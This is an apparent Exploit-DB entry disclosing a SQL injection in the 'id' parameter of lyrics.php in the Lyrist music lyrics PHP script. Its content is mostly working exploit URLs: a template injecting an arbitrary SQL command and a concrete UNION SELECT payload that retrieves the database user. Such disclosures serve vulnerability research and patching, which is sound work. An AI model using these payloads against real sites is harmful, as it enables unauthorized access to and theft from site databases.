Lyrist - 'id' SQL Injection

EDB-ID: 44772
Author: Meisam Monsef
Published: 2018-05-27
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-05-26 
# Exploit Author: Meisam Monsef - [email protected] - @meisamrce
# Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script
# Version: All Version


Exploit :
http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23
http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23

Related Posts